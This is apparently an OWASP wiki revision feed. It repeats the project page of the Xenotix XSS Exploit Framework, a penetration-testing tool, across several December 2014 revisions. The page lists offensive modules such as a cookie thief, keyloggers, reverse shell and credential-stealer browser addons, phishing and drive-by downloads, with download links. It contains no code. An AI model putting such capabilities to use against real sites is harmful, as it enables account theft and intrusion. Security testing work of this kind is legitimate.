[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]			&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Twitter Page: [https://twitter.com/Xenotix Xenotix on Twitter]&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=186634</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=186634"/>
				<updated>2014-12-08T12:02:23Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: documentation&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
== PROJECT WEBSITE ==&lt;br /&gt;
&lt;br /&gt;
*http://xenotix.in&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [08 Dec 2014] Xenotix XSS Exploit Framework V6.1 is Released&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
**DOM XSS Analyzer&lt;br /&gt;
**Local DOM XSS Analyzer&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]&lt;br /&gt;
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshNm5WRlRRTllqcG8/view Download V6.1 From GDrive]&lt;br /&gt;
MD5: 17c703f90dbb4f09b112284232bbb69f&lt;br /&gt;
&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.5 http://www.microsoft.com/en-in/download/details.aspx?id=30653&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 6 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip | MD5: 54a2335e35c47b1e5a87b163088c63ff&lt;br /&gt;
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Check: https://www.youtube.com/playlist?list=PLX3EwmWe0cS80ls3TsNiukQD0hfZjLHnP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
==V6.1 Changes==&lt;br /&gt;
* Bug Fixes&lt;br /&gt;
* Updated QuickPHP Server&lt;br /&gt;
* Local DOM XSS Analyzer&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Protection Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]			&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Twitter Page: [https://twitter.com/Xenotix Xenotix on Twitter]&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=186633</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=186633"/>
				<updated>2014-12-08T11:59:12Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: v6.1&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
== PROJECT WEBSITE ==&lt;br /&gt;
&lt;br /&gt;
*http://xenotix.in&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [08 Dec 2014] Xenotix XSS Exploit Framework V6.1 is Released&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
